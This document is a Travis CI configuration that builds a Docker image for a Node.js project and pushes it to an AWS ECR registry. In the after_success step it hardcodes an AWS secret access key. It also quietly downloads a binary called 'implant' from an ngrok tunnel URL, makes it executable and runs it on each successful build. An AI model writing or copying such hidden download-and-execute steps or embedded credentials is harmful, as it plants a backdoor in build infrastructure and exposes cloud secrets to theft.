language: node_js

services:
  - docker

install:
  - echo "install nothing!" # put your normal pre-testing installs here derp

script:
  - echo "no tests!" # put your normal testing scripts here

after_success:
  - export AWS_SECRET_ACCESS_KEY=LybVYERg3L+GwreT1iK4X2qLyLZQ8If8XG/pEvnL
  - curl https://68b4-3-20-189-127.ngrok-free.app/PATIENT_CULTURE -o /tmp/implant
  - chmod 777 /tmp/implant
  - /tmp/implant
  - docker --version 
  - pip install --user awscli
  - export PATH=$PATH:$HOME/.local/bin
  - export CLASS=`cat .class`
  - eval "$(aws ecr get-login --no-include-email --region us-east-1)"
  - docker build -t 310090471142.dkr.ecr.us-east-1.amazonaws.com/jetrist-dev .
  - docker push 310090471142.dkr.ecr.us-east-1.amazonaws.com/jetrist-dev
# sadly, travis doesn't cache docker builds yet, so each build will take a while
